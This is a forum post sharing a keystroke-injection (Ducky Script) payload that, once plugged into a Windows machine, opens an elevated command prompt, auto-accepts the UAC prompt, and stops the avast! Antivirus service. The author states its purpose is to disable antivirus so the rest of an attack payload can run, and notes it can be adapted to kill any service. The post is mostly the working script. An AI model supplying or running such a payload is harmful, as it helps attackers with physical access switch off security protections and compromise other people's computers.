Jump to content

[Payload] Stop avast! Antivirus service


buzbee

Recommended Posts

Not much to be said here.

Stops avast! Antivirus shields to allow payload to fully execute.

Could very easily be modified to stop any running services by name.

DELAY 15000
REM This script will use an elevated command prompt to stop a service.
REM I personally use this script to stop avast! Antivirus so I can execute the rest of my payload.
GUI d
DELAY 500
GUI r
DELAY 500
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING net stop "avast! Antivirus"
ENTER
DELAY 1000
LEFTARROW
LEFTARROW
LEFTARROW
DELAY 500
ENTER
DELAY 1000
STRING exit
ENTER

The end lines are for confirmation that you want avast shields to be shut down

If using this to stop another service please comment out the following line or change them to what is needed.

LEFTARROW
LEFTARROW
LEFTARROW
DELAY 500
ENTER

That is all, thanks for looking at my script!

Edited by buzbee
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...